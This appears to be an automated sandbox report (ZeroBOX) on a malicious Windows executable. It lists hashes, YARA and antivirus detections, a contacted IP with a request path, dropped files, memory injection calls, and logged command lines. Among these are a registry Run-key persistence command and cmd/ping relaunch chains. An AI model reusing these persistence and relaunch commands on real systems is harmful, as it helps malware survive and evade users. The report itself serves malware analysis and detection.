Summary | ZeroBOX

rldr.10.4.exe

Category Machine Started Completed
FILE s1_win7_x6401 April 2, 2021, 10:35 a.m. April 2, 2021, 10:52 a.m.
Size 316.0KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 81e6dcf2510ffc2400743e912448013f
SHA256 258ad65c676c26e608f331bc538a985fd4ac019c6ca4229e4e197acaa93d82c4
CRC32 0C8E2973
ssdeep 6144:4hzyPKlU/jriw3T2ZWAz7aFnFLbUkMHEdlFzMKVEyMWAF:AOCqZU81i9W
PDB Path k:\async-socket-win32-demo\x64\Release\AsyncSocket.pdb
Yara
  • PE_Header_Zero - PE File Signature Zero
  • network_dns - Communications use DNS
  • win_files_operation - Affect private profile

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
34.212.193.150 Active Moloch
8.8.7.7 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
pdb_path k:\async-socket-win32-demo\x64\Release\AsyncSocket.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET https://34.212.193.150/kenichi/aura20b/zero21
request GET https://34.212.193.150/kenichi/aura20b/zero21
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001c10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1120
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001d10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2244
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001c10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001c10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077219000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077218000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\RT4B706.exe
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000018000018
filepath: C:\Users\test22\AppData\Roaming\Microsoft
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000018000018
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000018000018
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000018000018
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000000001e00001e
filepath: C:\Users\test22\AppData\Roaming\Microsoft
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000000001e00001e
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000000001e00001e
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000000001e00001e
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000000041000041
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE)
file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001
create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT)
status_info: 4294967295 ()
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
-1073741771 0
cmdline cmd.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 1160
thread_handle: 0x00000000000000ec
process_identifier: 1756
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe VVWDQI5
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000f0
1 1 0

CreateProcessInternalW

thread_identifier: 2564
thread_handle: 0x00000000000000c4
process_identifier: 1572
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4B706.exe NHXU1K
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000ec
1 1 0

CreateProcessInternalW

thread_identifier: 804
thread_handle: 0x00000000000000ec
process_identifier: 2364
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rT4B706.exe NICE
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000f0
1 1 0
Elastic malicious (high confidence)
Kaspersky UDS:DangerousObject.Multi.Generic
Paloalto generic.ml
FireEye Generic.mg.81e6dcf2510ffc24
Kingsoft Win32.Hack.Undef.(kcloud)
Cynet Malicious (score: 90)
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 122880
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x0000000002541000
process_handle: 0xffffffffffffffff
1 0 0
section {u'size_of_data': u'0x0002e200', u'virtual_address': u'0x00026000', u'entropy': 7.457193510757247, u'name': u'.rsrc', u'virtual_size': u'0x0002e138'} entropy 7.45719351076 description A section with a high entropy has been found
entropy 0.585714285714 description Overall entropy of this PE file is high
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
cmdline ping 8.8.7.7 -n 2
cmdline cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe VVWDQI5
cmdline cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rT4B706.exe NICE
cmdline cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4B706.exe NHXU1K
host 34.212.193.150
host 8.8.7.7
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3060
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000049d60000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000358
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\L6BC9S31KAU reg_value cmd.exe /c reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v J7VKJT64 /t REG_SZ /d "C:\Users\test22\AppData\Local\Temp\RT4B706.exe NICE" & start "H" C:\Users\test22\AppData\Local\Temp\RT4B706.exe NICE
file C:\Users\test22\AppData\Local\Temp\RT4B706.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†9”e`ð" Î$Ô!ÖI `ƒ p°à.textÊÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatapÜ@@
base_address: 0x0000000049d60000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0

WriteProcessMemory

